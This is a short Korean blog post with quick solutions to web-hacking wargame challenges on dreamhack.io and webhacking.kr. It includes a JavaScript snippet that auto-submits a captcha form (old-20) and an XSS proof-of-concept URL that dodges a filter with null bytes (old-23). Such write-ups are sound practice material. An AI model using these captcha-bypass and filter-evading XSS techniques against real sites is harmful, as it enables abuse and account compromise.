dreamhack.io -> dev tools
개발자 도구 이용해서 디렉토리 검색하다보면 나온다.
webhacking.kr -> old-15
javascript disable 한 후 접근하면 FLAG를 얻을 수 있다.
webhacking.kr -> old-20
개발자 도구를 이용해서 captcha value를 자동으로 가져온 후, 제출하는 자바스크립트 코드를 작성하여 새로고침 시 코드를 바로 실행하면 된다.
Payload
(function() {
lv5frm.id.value = "hi";
lv5frm.cmt.value = "hi";
lv5frm.captcha.value = lv5frm.captcha_.value;
lv5frm.submit()
})()
webhacking.kr -> old-23
poc
https://webhacking.kr/challenge/bonus-3/index.php?code=%3C%00s%00c%00r%00i%00p%00t%3Ea%00l%00e%00r%00t(%001%00);%3C%00/%00s%00c%00r%00i%00p%00t%3E'Hacking > Web' 카테고리의 다른 글
| [LG U+ Security Hackathon FINAL] page (0) | 2024.12.06 |
|---|